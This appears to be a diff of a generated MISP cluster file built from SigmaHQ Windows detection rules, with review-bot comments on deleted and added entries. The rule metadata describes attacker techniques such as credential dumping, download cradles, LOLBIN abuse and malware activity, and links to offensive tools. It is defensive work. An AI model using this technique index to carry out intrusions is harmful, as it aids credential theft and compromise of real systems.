"https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712",
- "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
- "https://twitter.com/JohnLaTwC/status/1223292479270600706",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
+ "https://twitter.com/JohnLaTwC/status/1223292479270600706",
+ "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"
],
"tags": [
@@ -74747,11 +71574,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/",
+ "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe",
"https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html",
- "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/",
"https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html",
- "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_susp_execution.yml"
],
"tags": [
@@ -74845,100 +71672,6 @@
"uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac",
"value": "Net.exe Execution"
},
- {
- "description": "Detects activity that could be related to Baby Shark malware",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/02/24",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_babyshark.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_babyshark.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.discovery",
- "attack.t1012",
- "attack.t1059.003",
- "attack.t1059.001",
- "attack.t1218.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35",
- "value": "Potential Baby Shark Malware Activity"
- },
- {
- "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020",
- "meta": {
- "author": "Markus Neis, Swisscom",
- "creation_date": "2020/06/18",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_ke3chang_tidepool.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ke3chang_tidepool.yml"
- ],
- "tags": [
- "attack.g0004",
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7b544661-69fc-419f-9a59-82ccc328f205",
- "value": "Potential Ke3chang/TidePool Malware Activity"
- },
{
"description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n",
"meta": {
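Review bot: this single hunk removes two unrelated entries, `Potential Baby Shark Malware Activity` (four `related` links) and `Potential Ke3chang/TidePool Malware Activity` (tagged `attack.g0004`), dated 2019 and 2020; both still have intact refs, so nothing in the hunk explains the deletion. If these result from narrowing which upstream rule directories are read, say so in the commit message and list the affected UUIDs (`2b30fa36-3a18-402f-a22d-bf4ce2189f35`, `7b544661-69fc-419f-9a59-82ccc328f205`).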
@@ -74952,8 +71685,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp",
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml"
],
@@ -74974,57 +71707,6 @@
"uuid": "1dd05363-104e-4b4a-b963-196a534b03a1",
"value": "Potential Suspicious Mofcomp Execution"
},
- {
- "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro",
- "creation_date": "2019/11/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2019_1378.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068",
- "attack.execution",
- "attack.t1059.003",
- "attack.t1574",
- "cve.2019.1378"
- ]
- },
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5",
- "value": "Exploiting SetupComplete.cmd CVE-2019-1378"
- },
{
"description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n",
"meta": {
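Review bot: the removed `Exploiting SetupComplete.cmd CVE-2019-1378` entry is the only one in this patch that carries a `cve.2019.1378` tag alongside its `attack.*` tags, and it has three `related` links; dropping it without a replacement loses that CVE-to-technique mapping. As with the other deletions, the reason (upstream removal or relocation) should be recorded.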
@@ -75039,8 +71721,8 @@
"logsource.product": "windows",
"refs": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/",
- "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/",
"https://twitter.com/pabraeken/status/993298228840992768",
+ "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"
],
"tags": [
@@ -75149,42 +71831,6 @@
"uuid": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6",
"value": "Mstsc.EXE Execution From Uncommon Parent"
},
- {
- "description": "Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023",
- "meta": {
- "author": "TropChaud",
- "creation_date": "2023/01/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/",
- "https://twitter.com/anfam17/status/1607477672057208835",
- "https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88",
- "https://www.joesandbox.com/analysis/790122/0/html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5cdbc2e8-86dd-43df-9a1a-200d4745fba5",
- "value": "Rhadamanthys Stealer Module Launch Via Rundll32.EXE"
- },
{
"description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name",
"meta": {
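Review bot: this hunk deletes the whole "Rhadamanthys Stealer Module Launch Via Rundll32.EXE" element (uuid 5cdbc2e8-86dd-43df-9a1a-200d4745fba5) outright, and the hunk header (-75149,42 +71831,6, with the new-file offset already about 3,300 lines behind the old one) shows this is one of many such removals. Any MISP event or attribute already tagged with that cluster uuid is left pointing at nothing, so please confirm the rule was actually deprecated or removed in the upstream SigmaHQ repository rather than skipped by the generator, and consider keeping removed elements in the cluster flagged as revoked or deprecated instead of dropping them, so existing tags keep resolving.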
@@ -75297,9 +71943,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
"https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394",
"http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"
],
"tags": [
@@ -75332,10 +71978,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/nas_bench/status/1535322450858233858",
- "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/",
"https://twitter.com/CyberRaiju/status/1273597319322058752",
"https://twitter.com/bohops/status/1276357235954909188?s=12",
+ "https://twitter.com/nas_bench/status/1535322450858233858",
+ "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"
],
"tags": [
@@ -75435,8 +72081,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
"https://twitter.com/jseerden/status/1247985304667066373/photo/1",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
"https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension",
"https://twitter.com/lefterispan/status/1286259016436514816",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml"
@@ -75580,8 +72226,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/Oddvarmoe/status/985518877076541440",
"https://lolbas-project.github.io/lolbas/Binaries/Print/",
+ "https://twitter.com/Oddvarmoe/status/985518877076541440",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"
],
"tags": [
@@ -75673,8 +72319,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/BloodHoundAD/SharpHound",
"https://github.com/BloodHoundAD/BloodHound",
+ "https://github.com/BloodHoundAD/SharpHound",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml"
],
"tags": [
@@ -75781,13 +72427,13 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/tag/ntds-dit/",
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
"https://github.com/zcgonvh/NTDSDumpEx",
- "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
"https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
+ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
"https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1",
+ "https://pentestlab.blog/tag/ntds-dit/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml"
],
"tags": [
@@ -75992,8 +72638,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://ss64.com/nt/mklink.html",
"https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md",
+ "https://ss64.com/nt/mklink.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml"
],
"tags": [
@@ -76158,8 +72804,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Replace/",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace",
+ "https://lolbas-project.github.io/lolbas/Binaries/Replace/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"
],
"tags": [
@@ -76225,8 +72871,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/med0x2e/vba2clr",
"https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic",
+ "https://github.com/med0x2e/vba2clr",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_parent.yml"
],
"tags": [
@@ -76339,9 +72985,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
"https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml"
],
"tags": [
@@ -76430,8 +73076,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/harr0ey/status/991670870384021504",
"https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml",
+ "https://twitter.com/harr0ey/status/991670870384021504",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml"
],
"tags": [
@@ -76497,9 +73143,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
"https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
"https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml"
],
"tags": [
@@ -76675,8 +73321,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1463526834918854661",
"https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5",
+ "https://twitter.com/mrd0x/status/1463526834918854661",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml"
],
"tags": [
@@ -76739,43 +73385,6 @@
"uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7",
"value": "Invoke-Obfuscation COMPRESS OBFUSCATION"
},
- {
- "description": "Detects Elise backdoor activity used by APT32",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2018/01/31",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_elise.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting",
- "https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_elise.yml"
- ],
- "tags": [
- "attack.g0030",
- "attack.g0050",
- "attack.s0081",
- "attack.execution",
- "attack.t1059.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f",
- "value": "Elise Backdoor Activity"
- },
{
"description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary",
"meta": {
@@ -76932,9 +73541,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
- "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml"
],
"tags": [
@@ -77027,7 +73636,7 @@
"author": "Nasreddine Bencherchali (Nextron Systems)",
"creation_date": "2023/04/18",
"falsepositive": [
- "Likelihood is related to how often the paths are used in the environement"
+ "Likelihood is related to how often the paths are used in the environment"
],
"filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml",
"level": "high",
@@ -77134,29 +73743,6 @@
"uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23",
"value": "Nslookup PowerShell Download Cradle - ProcessCreation"
},
- {
- "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)",
- "creation_date": "2022/11/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/filip_dragovic/status/1590104354727436290",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120",
- "https://twitter.com/filip_dragovic/status/1590052248260055041",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3",
- "value": "Suspicious Sysmon as Execution Parent"
- },
{
"description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process",
"meta": {
@@ -77229,8 +73815,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
- "https://ss64.com/bash/rar.html",
"https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/",
+ "https://ss64.com/bash/rar.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml"
],
"tags": [
@@ -77273,31 +73859,6 @@
"uuid": "0b0cd537-fc77-4e6e-a973-e53495c1083d",
"value": "Renamed Office Binary Execution"
},
- {
- "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/04/17",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/kagancapar/status/1515219358234161153",
- "https://github.com/kagancapar/CVE-2022-29072",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2022_29072_7zip.yml"
- ],
- "tags": [
- "attack.execution",
- "cve.2022.29072"
- ]
- },
- "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3",
- "value": "Potential CVE-2022-29072 Exploitation Attempt"
- },
{
"description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files",
"meta": {
@@ -77311,9 +73872,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/",
"https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"
],
@@ -77348,8 +73909,8 @@
"logsource.product": "windows",
"refs": [
"https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e",
- "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/netero1010/TrustedPath-UACBypass-BOF",
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml"
],
"tags": [
@@ -77382,8 +73943,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
"https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
+ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml"
],
"tags": [
@@ -77478,6 +74039,40 @@
"uuid": "1af57a4b-460a-4738-9034-db68b880c665",
"value": "PowerShell SAM Copy"
},
+ {
+ "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.",
+ "meta": {
+ "author": "pH-T (Nextron Systems)",
+ "creation_date": "2023/04/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_hktl_certify.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/GhostPack/Certify",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certify.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.credential_access",
+ "attack.t1649"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "762f2482-ff21-4970-8939-0aa317a886bb",
+ "value": "HackTool - Certify Execution"
+ },
{
"description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument",
"meta": {
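Review bot: the new "HackTool - Certify Execution" element is well formed, but its description is missing punctuation ("Detects Certify a tool for Active Directory certificate abuse" should read "Detects Certify, a tool for ..."); since this JSON is generated from the upstream rule, the fix belongs in proc_creation_win_hktl_certify.yml rather than here. Also worth a check before merge: the single "related" entry (dest-uuid 7de1f7ac-5d0c-4c9c-8873-627202205331) is meant to correspond to the only technique tag, attack.t1649, so verify that uuid is the ATT&CK attack-pattern cluster for T1649 and not one of the two tactic tags.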
@@ -77491,8 +74086,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
"https://twitter.com/jseerden/status/1247985304667066373/photo/1",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/",
"https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension",
"https://twitter.com/lefterispan/status/1286259016436514816",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml"
@@ -77729,8 +74324,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/",
"https://lolbas-project.github.io/lolbas/Binaries/Xwizard/",
+ "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"
],
"tags": [
@@ -77941,40 +74536,6 @@
"uuid": "e01fa958-6893-41d4-ae03-182477c5e77d",
"value": "Remote Access Tool - RURAT Execution From Unusual Location"
},
- {
- "description": "Detects a command used by conti to find volume shadow backups",
- "meta": {
- "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)",
- "creation_date": "2021/08/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_conti.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml"
- ],
- "tags": [
- "attack.t1587.001",
- "attack.resource_development"
- ]
- },
- "related": [
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d",
- "value": "Conti Volume Shadow Listing"
- },
{
"description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.",
"meta": {
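Review bot: the removed "Conti Volume Shadow Listing" element was tagged attack.t1587.001 / attack.resource_development (Develop Capabilities: Malware) for what its own description calls "a command used by conti to find volume shadow backups", which is an odd technique mapping for a host-side discovery or recovery-inhibition command. The deletion itself follows the same pattern as the other rule removals in this diff (uuid 7b30e0a7-c675-4b24-8a46-82fa67e2433d will dangle for anything tagged with it), but if the rule is ever reinstated upstream the ATT&CK mapping should be revisited at the same time.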
@@ -78022,10 +74583,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
- "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
"https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml",
